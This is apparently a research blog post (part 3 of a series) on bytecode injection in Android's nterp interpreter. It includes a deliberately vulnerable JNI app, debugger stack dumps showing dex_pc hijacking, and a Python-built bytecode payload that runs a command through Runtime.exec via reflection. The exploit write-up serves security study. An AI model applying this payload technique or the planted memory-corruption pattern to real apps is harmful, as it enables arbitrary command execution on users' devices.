Bytecode Injection (Part 3)

With all the basics out of the way, this blog post shows the first bytecode - based exploitation technique on Android: bytecode injection! This opens the door to many interesting exploits, where injected bytecode can function as a one - in - all solution or an intermediate stage.

In order to fully understand this technique, it is recommended to read the introductory blog posts first! As of writing, there is no public information on this topic except for the Android source code.

Motivation

When exploiting a memory error, several security mechanisms must be bypassed. These include, but are not limited to, DEP/N^X, ASLR, RELRO, Canaries, and, if you are unlucky, ShadowStack, CFI and SafeStack. Notice that these security mechanisms have not been developed all at once, but rather one by one in response to emerging exploitation techniques. For example, native code injection on the stack caused the stack to be mapped with rw- instead of rwx. Another example is ASLR being a response to return - into - libc and ROP. This is called the arms race in binary exploitation, where a response from the offensive security community triggers a response from the defensive security community and vice versa.

Unfortunately, native code is not the only resource that can be executed. Notice that native code is basically interpreted by the CPU. With that in mind, other interpreters can be investigated and analysed for whether they allow particular exploitation techniques. In case of this blog series, Android’s interpreter nterp is analysed for parallels to the exploitation techniques of native code.

The general motivation for why other interpreters are interesting in the context of exploitation techniques is simple: most security mechanisms are interpreter - specific, i.e. specific to execution environment (architecture, OS, …). For example, DEP/N^X enforces that pages are never rwx (for the sake of the example, ignore JIT). Hence, native code injection is not feasible. However, changing the interpreter to nterp also changes the entire execution environment an attacker is working with. As we see later on, no one prevents an attacker from injecting and executing bytecode. In other words, most security mechanisms for one interpreter do not generalize to other interpreters.

The Problems

Although impossible to prove with concrete references, I claim that nterp does not distinguish data and code. In other words, whatever the dex_pc is set to is interpreted. This is exactly what had happened decades ago with native code! Identical to early days of binary exploitation, given the ability to redirect control - flow through a memory error, nterp can be forced to execute whatever an attacker desires.

Consider the following example. In a setting where an attacker gets access to a stack pointer and the ability to repeatedly exploit a stack - buffer index out - of - bounds write, with bytecode, it is possible to construct an exploit. Even worse, directly using classical native - level techniques like ROP seems infeasible, because ROP needs leaks on executable memory regions. So, bytecode injection opens new avenues for exploitation!

While the above example works for a remote attacker, a local attacker is not even constrained by ASLR, because of Android’s fork server architecture. A local attacker in the above example enables ROP and boosts bytecode injection, because a lot of data is identical over multiple apps.

Sample App

For this blog post, we construct a simple, deliberately vulnerable app with

a repeatable stack - buffer index out - of - bounds write primitive, and
a single stack address leak.

The idea is to create a scenario where e.g. ROP is infeasible and bytecode injection is simple. Not only does this approach ease understanding nuances of bytecode - based exploitation, but it also shows that bytecode injection is not superfluous, i.e. it is a new tool in an attacker’s tool box.

Notice that the app assumes a remote attacker, which is facilitated using simple socket I/O. In practice, an attacker may serve a malicious website that exploits a bug in V8 or perform a MITM attack on the communication of the target app and a backend server. Now, consider the following, relevant app snippets.

private void run() {
    while (true) {
        try {
            Log.d(TAG, "Initializing server....");
            this.initServer();

            Log.d(TAG, "Setting up connection....");
            this.setupConnection();

            // Send leak
            this.writeLong(MainActivity.leakStack());

            // Loop until user wants to exit
            while (this.readBool()) {
                // Receive index and value for stack oob
                MainActivity.writeIndexed(this.readInt(), this.readLong());
            }
        } catch (final IOException e) {
            e.printStackTrace();
        } finally {
            this.close();
        }
        if (!stayAlive) {
            break;
        }
        Log.d(TAG, "Restarting server socket....");
    }
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        new Thread(this::run).start();
    }
}

public static native long leakStack();
public static native void writeIndexed(int index, long value);

Below are the vulnerable, native methods invoked in the above Java code. The memory errors, i.e. a unique stack pointer leak and a repeatable stack - buffer index out - of - bounds write, manifest at the JNI layer.

extern "C"
JNIEXPORT jlong JNICALL
Java_com_poc_poc_1remote_MainActivity_leakStack(JNIEnv *env, jclass clazz) {
    uint64_t i;
    return (uint64_t)&i;
}

extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
                                                   jint index, jlong value)
                                                   __attribute__ ((optnone)) {
    uint64_t i;
    uint64_t *buffer = &i;
    buffer[index] = value;
}

For some reason optimizations for writeIndexed had to be disabled, probably because some data - flow analysis in the compiler realized that the code does not really do anything meaningful, i.e. no (direct) outputs. However, this suffices for the purpose of proving that bytecode injection is possible.

With the above setup, a remote attacker can connect to the vulnerable app and repeatedly write on the stack. Moreover, an attacker is able to construct data structures and references to these structures on the stack, yielding a powerful primitive especially for data - oriented attacks.

Building the app in release mode with default Android Studio settings yields an .apk file, which is actually a .zip file.

$ unzip app-release.apk
$ ls
AndroidManifest.xml  assets  classes.dex  DebugProbesKt.bin  kotlin  lib  META-INF  res  resources.arsc

There is only a single classes.dex file that must account for all Java code in the app. Moreover, the classes.dex file must contain some of the framework - related bytecode, types etc. required to launch the app. Therefore, the context of e.g. MainActivity::run is classes.dex. What is more is that classes.dex holds a lot more types and methods than are used to program the sample app. A quick .dex file analysis reveals that classes.dex indeed holds additional types and methods.

> file --file unpacked_poc_remote/classes.dex --type DEX
classes.dex> list types --regex java/lang/Runtime
    [Index = 0x1507]: java/lang/Runtime
    [Index = 0x1508]: java/lang/RuntimeException
classes.dex> list methods --regex "Runtime::getRuntime"
    [Index = 0xa6ee]: java/lang/Runtime java/lang/Runtime::getRuntime()

Before delving into exploitation, lets see how the native methods are invoked by MainActivity::run. To increase readability, Lcom/poc/poc_remote/MainActivity is replaced with LMainActivity, where L indicates an object type, and some formatting is done.

classes.dex> list methods --regex "MainActivity::run"
    [Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
        private void MainActivity::run()
    [Index = 0xa51d]:
        void MainActivity::run()
classes.dex> decompile method --index 0xa51d
    [Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
    private void MainActivity::run()
        ...
        001e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->setupConnection()V
        0024: INVOKE_STATIC {}, METHOD:LMainActivity;->leakStack()J
        002a: MOVE_RESULT_WIDE v0
        ...
        003e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readInt()I
        0044: MOVE_RESULT v0
        0046: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readLong()J
        004c: MOVE_RESULT_WIDE v1
        004e: INVOKE_STATIC {v0, v1, v2}, METHOD:LMainActivity;->writeIndexed(I,J)V
        0054: GOTO +-17
        ...

Basically, invocations of MainActivity::leakStack and MainActivity::writeIndexed use the invoke-static instruction. This is not surprising, because both methods are declared using the static keyword. Unfortunately it is unclear why writeIndexed is given v2 as a third parameter. Overall, bytecode is used to execute native methods, and thus execution must eventually continue in bytecode after the native methods are done executing.

Note: Offsets are in terms of code units. In the above code snippet, the GOTO +-17 actually references 0x54 + 2 * (-17) = 0x32. In general, each instruction uses a multiple of code units bytes, which means instruction offsets and addresses are always two - byte aligned!

Bytecode Injection

From a previous blog post, we know that the bytecode return address lies on the stack. So, the layout of nterp and JNI stack frames can be used to identify what critical data is in close proximity to the oob write. Below is an excerpt from a particular app execution.

gef➤  canary
    [+] The canary of process 9862 is at 0x7ff247af28, value is 0xe009ee421ed97f00
gef➤  i r sp
    sp             0x7c0fe66620        0x7c0fe66620
gef➤  hexdump qword $sp --size 0x28
0x7c0fe66620 │+0x0000   0x0013000000000000   // <-- $sp
0x7c0fe66628 │+0x0008   0x0000007c0fe66650   
0x7c0fe66630 │+0x0010   0x0013000000000000   
0x7c0fe66638 │+0x0018   0x0000020000000000   
0x7c0fe66640 │+0x0020   0x0000007f27664480   
0x7c0fe66648 │+0x0028   0xb400007d48b969f0   
0x7c0fe66650 │+0x0030   0x0000000000000000   
0x7c0fe66658 │+0x0038   0x66f0649020037d8d   // Stack canary
0x7c0fe66660 │+0x0040   0x0000007c0fe66758   // Old base pointer (x29)
0x7c0fe66668 │+0x0048   0x0000007c14c741ac   // Return address (x30)
0x7c0fe66670 │+0x0050   0x0000007f27664480   // ArtMethod* <---- END OF JNI FRAME
0x7c0fe66678 │+0x0058   0x0000007c0fe66748   // Padding? (Vrefs of calling method)
0x7c0fe66680 │+0x0060   0x0000000000000000   // Padding
0x7c0fe66688 │+0x0068   0x0000000000000000   // Padding? Expected d0-d7
0x7c0fe66690 │+0x0070   0x0000000000000000   // x1
0x7c0fe66698 │+0x0078   0x0000000000000000   // x2
0x7c0fe666a0 │+0x0080   0x0000000000000000   // x3
0x7c0fe666a8 │+0x0088   0x0000000000000000   // x4
0x7c0fe666b0 │+0x0090   0x0000000000000000   // x5
0x7c0fe666b8 │+0x0098   0x0000000000000000   // x6
0x7c0fe666c0 │+0x00a0   0xb400007df8b82a10   // x7
0x7c0fe666c8 │+0x00a8   0x0000000000000000   // Marking Register (MR, x20)
0x7c0fe666d0 │+0x00b0   0xb400007df8b82ad0   // Suspend (x21)
0x7c0fe666d8 │+0x00b8   0x0000007c147a64be   // dex_pc_ptr (PC, x22)
0x7c0fe666e0 │+0x00c0   0x0000007c14a867f3   // Current Instruction (INST, x23)
0x7c0fe666e8 │+0x00c8   0x0000007c87400880   // Table of bytecode handlers (IBASE, x24)
0x7c0fe666f0 │+0x00d0   0x0000007c0fe66748   // VRefs (REFS, x25)
0x7c0fe666f8 │+0x00d8   0x0000007c0fe66758   // x26 (informally: vregs)
0x7c0fe66700 │+0x00e0   0x0000007c0fe66748   // x27
0x7c0fe66708 │+0x00e8   0x0000007c0fe66770   // x28
0x7c0fe66710 │+0x00f0   0x0000007c0fe66758   // FP (x29)
0x7c0fe66718 │+0x00f8   0x0000007c87409aa0   // Return address (x30)
0x7c0fe66720 │+0x0100   0x0000007f27664440   // ArtMethod* <---- END OF NTERP FRAME
0x7c0fe66728 │+0x0108   0x0000007f276071e0   // ArtMethod*
0x7c0fe66730 │+0x0110   0x0000007c147a62a8   // Alignment? may be a dex pc
0x7c0fe66738 │+0x0118   0x0000007c147a64be   // dex_pc_ptr
0x7c0fe66740 │+0x0120   0x0000007c0fe66770   // Caller Frame Pointer (FP)
0x7c0fe66748 │+0x0128   0x0000000000000000   // Vrefs
0x7c0fe66750 │+0x0130   0x12f8084800000000   
0x7c0fe66758 │+0x0138   0x0000000000000200   // Vregs
0x7c0fe66760 │+0x0140   0x12f8084800130000

Surprisingly, the JNI frame is slightly modified, as the above instance does not contain spilled floating point registers d0 to d7. However, as the comment in the JNI frame states, only a generic JNI frame is described, not concrete frames for every possible invocation scenario. An interesting observation is that gef claims the canary is 0xe009ee421ed97f00, but the disassembly of writeIndexed suggests the canary is 0x66f0649020037d8d. Apparently, Android’s Bionic library uses random canaries , which also seems to apply to Android’s runtime. Further, there are two instances of a dex_pc_ptr! From top to bottom, the first one is part of the spilled registers in the JNI frame, so it will be put back into x22 upon return to the calling method. The second one seems to be stored and managed in the nterp frame. Maybe this is used to ensure that x22 can be restored on function invocations where x22 is not spilled.

Lets verify that bytecode execution continues at whatever value is stored in the spilled x22 on the stack. Basically, we can overwrite the value with something arbitrary, like 0x4242424242424242!

gef➤  set *(unsigned long long*)0x0000007c0fe666d8=0x4242424242424242
gef➤  c                                                                                              
Continuing.                                                                                          
                                                                                                     
Thread 20 "Thread-2" received signal SIGSEGV, Segmentation fault.                                    
...
$x22 : 0x4242424242424242 ("BBBBBBBB"?)
...
→ 0x7c87409ac0 <nterp_helper+1984> ldrh   w23,  [x22,  #6]!         // x23 = xINST (next opcode)
  0x7c87409ac4 <nterp_helper+1988> and    x16,  x23,  #0xff         // x16 = first byte of next instruction
  0x7c87409ac8 <nterp_helper+1992> add    x16,  x24,  x16,  lsl #7  // x16 = IBASE + opcode * <bytecode handler size>
  0x7c87409acc <nterp_helper+1996> br     x16                       // branch to handler

So, nterp tries to use the spilled register value to derive the next bytecode instruction. Thus, overwriting this value enables an attacker to redirect bytecode control - flow to any location. Most importantly, bytecode execution can be pivoted to a controlled location. In this case: the stack. Of course, either the dex_pc_ptr must be set to addr_payload-6 or the first three instructions should be NOPs to account for the added 6 in the faulting instruction, i.e. the size of the invoke-static instruction used to invoke writeIndexed.

With the ability to control where nterp continues execution, it remains to figure out what to execute.

Building a Bytecode Payload

First of all, the goal must be clarified. In this case, the goal is command execution in the context of the vulnerable app using only bytecode. However, gaining native code execution using bytecode as intermediate stage to set up e.g. the stack is also possible. Command execution is chosen, because it involves calling at least one legitimate method. Therefore, showing that command execution is possible also proves that bytecode injection is capable of invoking normal library or application - specific methods, despite coming from a memory error. For simplicity, we try to get the following Java code directly in bytecode.

Runtime.getRuntime().exec("log Hello");

Naively translating this to bytecode, e.g. by creating a PoC app, building it and decompiling the .apk file or using d8 , yields the first payload version.

classes.dex> list methods --regex Runtime::getRuntime
[Offset = 0x0]: classes.dex
    [Index = 0xa254]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "MainActivity::simpleShellcode"
[Offset = 0x0]: classes.dex
    [Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
        private void MainActivity::simpleShellcode()
    [Index = 0xa097]:
        void MainActivity::simpleShellcode()
classes.dex> decompile method --index 0xa097
    [Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
    private void MainActivity::simpleShellcode()
        0000: INVOKE_STATIC {}, METHOD:LRuntime;->getRuntime()LRuntime;
        0006: MOVE_RESULT_OBJECT v1
        0008: CONST_STRING v0, STRING:"log Hello"(14)
        000c: INVOKE_VIRTUAL {v1, v0}, METHOD:LRuntime;->exec(LString;)LProcess;
        0012: RETURN_VOID

With such a payload at hand, one may be tempted to copy it over and try it! However, as another app is used to construct this payload, most certainly type and method indices are incorrect. An example is that invoke-static invokes the Runtime::getRuntime method with index 0xa254. From a previous section it is known that the sample app uses Runtime::getRuntime with index 0xa6ee. Therefore, these indices are incompatible. The same holds for the String constant "log Hello". Most certainly the vulnerable app does not even contain such a String constant! Therefore, to get command execution using Runtime.getRuntime().exec("..."), we need to construct a payload that is more dynamic. To that end, we strive for the following properties:

dynamic String instances
dynamic method invocation

Using a different app is helpful to get the overall payload layout and avoids having to deal with e.g. register allocations. However, a context is often app - specific, which must be considered during payload construction.

Dynamic Strings

As discussed in a previous blog post, the instruction fill-array-data can be used to fill an array with data directly located inside the bytecode. So, long story short, an arbitrary char[] can be constructed using fill-array-data. For this to work, an attacker needs to know the type index of a char[]. Luckily, the char[] type is used frequently, so it most likely resides in any .dex we encounter. For a start the payload looks like below:

new-array v0, <length>, char[]
fill-array-data v0, +<byte offset//2>
...
[fill-array-data-payload]
ident=0x0300
element_width=0x2
size=len(command)
data=[ command[0], ..., command[-1] ]

From now on, assume an attacker has a char[] instance describing a command, like "log Hello". The next step is to construct a String from a char[]. On Android, StringBuilder is the type of choice. Again, it is used so frequently that every .dex file is expected to contain the corresponding type. The main challenge is whether StringBuilder::append(char[]) exists. In case of the vulnerable app it does, but it may not be the case for another app. If there is no way to construct a String from bytecode, an attacker can also inject a fake String object (see next post regarding bytecode reuse). Continuing with the StringBuilder, consider the following analysis:

classes.dex> list types --regex "StringBuilder"
    [Index = 0x150f]: StringBuilder
classes.dex> list methods --regex "StringBuilder::append"
    [Index = 0xa750]: StringBuilder StringBuilder::append([C)
classes.dex> list methods --regex "StringBuilder::<init>"
    [Index = 0xa741]: void StringBuilder::<init>()
classes.dex> list methods --regex "StringBuilder::toString"
    [Index = 0xa75d]: String StringBuilder::toString()

As the name suggests, StringBuilder::<init>() is the constructur of StringBuilder that does not take any parameters. In Java, invoking this constructor is done via new StringBuilder(). Overall, the following Java snippet describes what we try to do directly in bytecode:

char[] c = new char[] {'l', 'o', 'g', ' ', 'H', 'e', 'l', 'l', 'o'};
StringBuilder b = new StringBuilder();
b.append(c);
String command = b.toString();

Putting together all the pieces and equipped with the bytecode documentation and a sample app for payload creation, the following bytecode can be constructed:

0000: CONST_16 v0, #+<len(command)>
0004: NEW_ARRAY v0, v0, TYPE:char[]
0008: FILL_ARRAY_DATA v0, +<offset to command data // 2>
000e: NEW_INSTANCE v1, TYPE:StringBuilder
0012: INVOKE_DIRECT {v1}, METHOD:StringBuilder-><init>()
0018: INVOKE_VIRTUAL {v1, v0}, METHOD:StringBuilder->append(char[])
001e: INVOKE_VIRTUAL {v1}, METHOD:StringBuilder->toString()
0024: MOVE_RESULT_OBJECT v2
...
offset command data: [fill-array-data-payload]

After the above bytecode is executed, v2 contains a reference to a String object with contents "log Hello". Notice that this bytecode is independent of the String’s semantics, i.e. this is a generic approach for constructing a String instance from a char[] and not specific to a system command! The only components that need to change for a new String are length fields and the array contents. Of course, one may have to use new vregs to prevent existing vregs from being clobbered.

Note: Calling the constructor on a newly created instance is sometimes optional. If the goal is to create a valid object, then one may only use new-instance, which means the index of the constructor method can be ignored. Of course, using the object later on may cause unexpected behaviour, including crashes.

Problem with String Constructors

One might ask why StringBuilder::append(char[]) is preferred over String::<init>(char[]). This is motivated by the fact that Strings are disabled on Android. At least the source code suggests that StringFactory should be used instead of the String type directly:

public String(char value[]) {
    // BEGIN Android-changed: Implemented as compiler and runtime intrinsics.
    /*
    this(value, 0, value.length, null);
            */
    throw new UnsupportedOperationException("Use StringFactory instead.");
    // END Android-changed: Implemented as compiler and runtime intrinsics.
}

Therefore, we directly use the StringBuilder type, also because it is used frequently and easy to use. Notice that although String constructors cannot be easily used, this does not imply that the String type occurs less frequently!

Dynamic Method Invocation

The problem to solve is as follows. Goal is to call Runtime.getRuntime().exec(command), but it cannot be assumed that the context of the bytecode provides the method indices for getRuntime and exec. Actually, Runtime.getRuntime() is very common, because it occurs in the context, although the method and Runtime type are not explicitly used in the vulnerable app:

classes.dex> list types --regex "Runtime"
    [Index = 0x1507]: Runtime
classes.dex> list methods --regex "Runtime::getRuntime"
    [Index = 0xa6ee]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "Runtime::exec"
classes.dex>

Unfortunately, Runtime::exec is not very common. Luckily, Java provides a feature called reflection. Obviously, the name of the function to be invoked is known, i.e. "exec". So, in Java, dynamically resolving the method looks like so:

Runtime.getRuntime().getClass().getDeclaredMethod("exec", [String.class]);

As can be seen in the above examples, including dynamic String creation, successful bytecode creation involves a lot of creativity and thinking out - of - the - box to find semantically fitting bytecode instruction sequences that use as few context - specific resources as possible. While it is possible to use Java code to construct the initial bytecode layout, indices etc. must be adjusted to fit the context. Bytecode generated from Java code may use e.g. types that are not available in the context.

The String type is also very common, so it can be assumed to be available in all .dex files and thus in every context an attacker encounters. With all that, the bytecode can be seen below. Notice that v6 := "exec".

003a: INVOKE_STATIC {}, METHOD:Runtime->getRuntime()
0040: MOVE_RESULT_OBJECT v4
0042: INVOKE_VIRTUAL {v4}, METHOD:Object->getClass()
0048: MOVE_RESULT_OBJECT v5
0052: CONST_4 v7, #+1
0054: NEW_ARRAY v7, v7, TYPE:[Class
0058: CONST_4 v8, #+0
005a: CONST_CLASS v9, TYPE:String
005e: APUT_OBJECT v9, v7, v8
0062: INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Class->getDeclaredMethod(String,Class[])

An alternative approach may be to use Runtime.class.getDeclaredMethod(...). However, we need the instance of Runtime for invocation of exec. This approach may save us the getClass invocation, although this would most likely be replaced with an equivalent instruction.

What is left to do is to invoke the resolved method. Of course, invocation depends on what parameters the target method expects. The below code snippet continues with calling exec.

0068: MOVE_RESULT_OBJECT v5
006a: v6 := "log Hello" ...
0072: FILLED_NEW_ARRAY {v6}, TYPE:[LObject;
0078: MOVE_RESULT_OBJECT v6
007a: INVOKE_VIRTUAL {v5, v4, v6}, METHOD:LMethod;->invoke(LObject;,[LObject;)

For simplicity, I omitted the creation of the "log Hello" command.

Observe that dynamically invoking methods using reflection requires knowledge of specific type and method indices, among which are:

Class[], String and Object[] type indices
Runtime::getRuntime(), Object::getClass(), Class::getDeclaredMethod(String, Class[]) and Method::invoke(Object, Object[]) method indices

With the above approaches, i.e. dynamic strings and method invocations, it is possible to get command execution using only bytecode from a memory error in a vulnerable app. Or so you may think, but the execution environment is cruel, especially as regards vreg allocations!

Limited, dynamic Vregs

A method specifies the amount of vregs needed to work in its associated code_item . When executing a method, nterp allocates as many vregs (and vrefs) as specified on the stack. Now, what happens if the hijacked method requested 4 vregs, but the payload uses 10? As has been discussed in a previous blog post, vregs and vrefs have the following properties:

Vrefs array precedes vregs array on stack.
Vrefs array is adjacent to vregs array.
Vrefs and vregs are parallel and entries are semantically linked. For example, vreg v0 is linked to vref r0.
Vrefs and vregs array accesses are not bounds - checked.

Continuing the example, accessing vregs v0 to v3 is legitimate. However, accessing v4 is problematic. In case the access to v4 is a write, then r4 will most likely also be overwritten. The problem is that r4 accesses the first value after the actual vrefs array, i.e. v0. Therefore, if something is stored into v0 and then e.g. a constant is written to v4, then v0 will be modified, in this case set to 0. Also, the first 32-bit value after vregs is changed to be the constant assigned to v4. This has the neat side - effect that an attacker can fully read and write stack values located after vrefs and vregs, enabling attacks like JITROP. From a bytecode perspective, depending on the amount of registers used in the payload, this is problematic, because registers holding important data like Runtime instance may be clobbered.

This is where math can save the day! Say the hijacked method requested N vregs. Then, the first overlap happens at v<N>, because this may also set r<N>, which overlaps with v0. So, to prevent overflowing into the vregs, an access to v<N> can be set to v<N+N>. This skips over the entire vregs array, and thus reinterprets the region after vregs as a fresh vrefs - vregs array pair. Hence, the mapping is N -> N+N, but what happens in case v<N+1> or v<N+2> are accessed? And what about v<N+N+N+2>? To resolve this problem, observe that each block, i.e. vregs accesses that do not overflow into the following block, is of size N * 2. The first block consists of the original vrefs and vregs, in that order, each of length N. Say the payload needs M vregs to work. Then the number of blocks is k := M // N + 1, where // is integer - division. Also, for a vreg index X, compute the offset into a block as X % N. Now, if vreg v<X> with 0 <= X < M is to be accessed, then compute block id X // N and offset X % N. The actual vreg access is then v<(X // N) * (N * 2) + (X % N)>. To summarize,

X // N: Block id
N * 2: Block size in register entries
X % N: Offset within a block

Consider the following visualization for the case where the payload uses 10 vregs, the hijacked method only allocated memory for 4 vregs, and the payload tries to access vreg v4. Of course, whatever data overlaps with the artificial blocks is corrupted. Hence, care must be taken when using this approach. Luckily, blocks can be shifted up the stack until no critical data is overwritten.

With a simple function, this can be abstracted away, so we never have to do math again:

v = lambda i: (i // available_vregs) * (2 * available_vregs) + (i % available_vregs)
v0 = v(0)
v1 = v(1)
v2 = v(2)
v3 = v(3)
v4 = v(4)

The Payload

Finally, with all caveats aside, the final payload can be constructed. It is beneficial to implement a BytecodeBuilder , which dynamically builds bytecode based on the documentation . This eases testing and constructing different kinds of payloads! In this case study, the payload can be fully expressed like below. Note that the comments do not always show the correct indices, lengths and offsets. Most of these values are computed dynamically or change with the payload size and layout. Also, another app is used to generate the payload layout and avoid having to deal with register allocations. The app is forced to use the tricks for dynamic strings and method invocations on Java - level.

builder = BytecodeBuilder(type_map={
            'char[]': char_array_index,
            'StringBuilder': stringbuilder_index,
            'Class[]': classarray_index,
            'String': string_index,
            'Object[]': objectarray_index,
            'Object': object_index,
        })

# [Index = 0x5, Offset = 0x31c, Num Regs = 0xa]: private static void com/poc/shellcode/MainActivity::shellcode()
    return (builder
# 0000: 13 00 12 00       CONST_16 v0, #+18
        .const_16(v0, len(command))
# 0004: 23 00 13 00       NEW_ARRAY v0, v0, TYPE:[C
        .new_array(v0, v0, 'char[]')
# 0008: 26 00 3e 00 00 00 FILL_ARRAY_DATA v0, +62
        .fill_array_data(v0, 65)
# 000e: 22 01 0d 00       NEW_INSTANCE v1, TYPE:Ljava/lang/StringBuilder;
        .new_instance(v1, 'StringBuilder')
# 0012: 70 10 0b 00 01 00 INVOKE_DIRECT {v1}, METHOD:Ljava/lang/StringBuilder;-><init>()V
        .invoke_direct(1, stringbuilder_constructor_index, [v1])
# 0018: 6e 20 0c 00 01 00 INVOKE_VIRTUAL {v1, v0}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
        .invoke_virtual(2, stringbuilder_append_chararray_index, [v1, v0])
# 001e: 12 42             CONST_4 v2, #+4
        .const_16(v2, 4)
# 0020: 23 22 13 00       NEW_ARRAY v2, v2, TYPE:[C
        .new_array(v2, v2, 'char[]')
# 0024: 26 02 46 00 00 00 FILL_ARRAY_DATA v2, +70
        .fill_array_data(v2, 65)
# 002a: 22 03 0d 00       NEW_INSTANCE v3, TYPE:Ljava/lang/StringBuilder;
        .new_instance(v3, 'StringBuilder')
# 002e: 70 10 0b 00 03 00 INVOKE_DIRECT {v3}, METHOD:Ljava/lang/StringBuilder;-><init>()V
        .invoke_direct(1, stringbuilder_constructor_index, [v3])
# 0034: 6e 20 0c 00 23 00 INVOKE_VIRTUAL {v3, v2}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
        .invoke_virtual(2, stringbuilder_append_chararray_index, [v3, v2])
# 003a: 71 00 09 00 00 00 INVOKE_STATIC {}, METHOD:Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
        .invoke_static(0, getruntime_index, [])
# 0040: 0c 04             MOVE_RESULT_OBJECT v4
        .move_result_object(v4)
# 0042: 6e 10 08 00 04 00 INVOKE_VIRTUAL {v4}, METHOD:Ljava/lang/Object;->getClass()Ljava/lang/Class;
        .invoke_virtual(1, object_getclass_index, [v4])
# 0048: 0c 05             MOVE_RESULT_OBJECT v5
        .move_result_object(v5)
# 004a: 6e 10 0d 00 03 00 INVOKE_VIRTUAL {v3}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
        .invoke_virtual(1, stringbuilder_tostring_index, [v3])
# 0050: 0c 06             MOVE_RESULT_OBJECT v6
        .move_result_object(v6)
# 0052: 12 17             CONST_4 v7, #+1
        .const_16(v7, 1)
# 0054: 23 77 14 00       NEW_ARRAY v7, v7, TYPE:[Ljava/lang/Class;
        .new_array(v7, v7, 'Class[]')
# 0058: 12 08             CONST_4 v8, #+0
        .const_16(v8, 0)
# 005a: 1c 09 0c 00       CONST_CLASS v9, TYPE:Ljava/lang/String;
        .const_class(v9, 'String')
# 005e: 4d 09 07 08       APUT_OBJECT v9, v7, v8
        .aput_object(v9, v7, v8)
# 0062: 6e 30 07 00 65 07 INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;,[Ljava/lang/Class;)Ljava/lang/reflect/Method;
        .invoke_virtual(3, class_getdeclaredmethod_index, [v5, v6, v7])
# 0068: 0c 05             MOVE_RESULT_OBJECT v5
        .move_result_object(v5)
# 006a: 6e 10 0d 00 01 00 INVOKE_VIRTUAL {v1}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
        .invoke_virtual(1, stringbuilder_tostring_index, [v1])
# 0070: 0c 06             MOVE_RESULT_OBJECT v6
        .move_result_object(v6)
# 0072: 24 10 15 00 06 00 FILLED_NEW_ARRAY {v6}, TYPE:[Ljava/lang/Object;
        .filled_new_array(1, 'Object[]', [v6])
# 0078: 0c 06             MOVE_RESULT_OBJECT v6
        .move_result_object(v6)
# 007a: 6e 30 0f 00 45 06 INVOKE_VIRTUAL {v5, v4, v6}, METHOD:Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;,[Ljava/lang/Object;)Ljava/lang/Object;
        .invoke_virtual(3, method_invoke_index, [v5, v4, v6])
# 0080: 0e 00             RETURN_VOID 
        .return_void()
# 0082: 00 00             NOP 
        .nop()
# 0084: ARRAY_PAYLOAD Array@{108, 111, 103, 32, 34, 104, 101, 108, 108, 111, 32, 116, 104, 101, 114, 101, 33, 34}
        .array_payload(2, len(command), command_buffer)
# 00b0: ARRAY_PAYLOAD Array@{101, 120, 101, 99}
        .array_payload(2, 4, b'e\x00x\x00e\x00c\x00')).build()

The java equivalent could look something like this:

char[] cCommand = new char[] { <command> };
StringBuilder bCommand = new StringBuilder();
bCommand.append(cCommand);
char[] cExec = new char[] {'e', 'x', 'e', 'c'};
StringBuilder bExec = new StringBuilder();
bExec.append(cExec);
Runtime runtime = Runtime.getRuntime();
Class<?> runtimeClass = runtime.getClass();
String execName = bExec.toString();
Class[] signature = new Class[] { String.class };
Method exec = runtimeClass.getDeclaredMethod(execName, signature);
String command = bCommand.toString();
Object[] args = new Object[] { command };
exec.invoke(runtime, args);

The Attack

With a payload at hand, it is time to abuse the memory error and obtain arbitrary command execution in the context of the target app.

Before injecting the bytecode, the leaked stack address must be understood properly in order to find the exact location of the payload. To that end, a particular execution yields a leak of 0x6eb6aec650. Remember the original C code of writeIndexed:

extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
                                                   jint index, jlong value)
                                                   __attribute__ ((optnone)) {
    uint64_t i;
    uint64_t *buffer = &i;
    buffer[index] = value;
}

With that in mind, lets consider the following simplified disassembly of the vulnerable writeIndexed method:

sub     sp, sp, #0x50
stp     x29, x30, [sp, #64]
add     x29, sp, #0x40  ; frame pointer = sp + 0x40
sub     x8, x29, #0x10  ; buffer = frame pointer - 0x10 = sp + 0x30
str     x8, [sp, #8]
...
ldr     x9, [sp, #8]    ; base address
ldrsw   x10, [sp, #28]  ; index
mov     x11, #0x8       ; element size
madd    x9, x10, x11, x9    ; where = index * size + base
str     x8, [x9]    ; indexed write

In a nutshell, the buffer is located 0x10 below the old base pointer and return address. This can be confirmed using a debugger:

gef➤  x/1gx $sp+0x8
    0x6eb6aec628:   0x0000006eb6aec650
gef➤  p/x $x29-0x10
    $1 = 0x6eb6aec650

Coincidentally, the pointer leaked via leakStack is exactly the base address of the buffer, relative to which the index oob write happens.

Now, two things must be identified:

At what index resides the dex_pc?
Where is a save location to store the payload to?

The first point is addressed to some degree in a previous section that showed a reverse - engineered view of the stack taking into account nterp and JNI stack frames. Therefore, without showing the details of the stack again, the byte offset to write to can be computed by subtracting the buffer base address from the address of the spilled x22 register. Then, because buffer elements are 64 - bit integers, divide by the element size to obtain the final index (we have an indexed oob write).

gef➤  p/x (0x00006eb6aec6d8 - 0x00006eb6aec650) / 8
$2 = 0x11

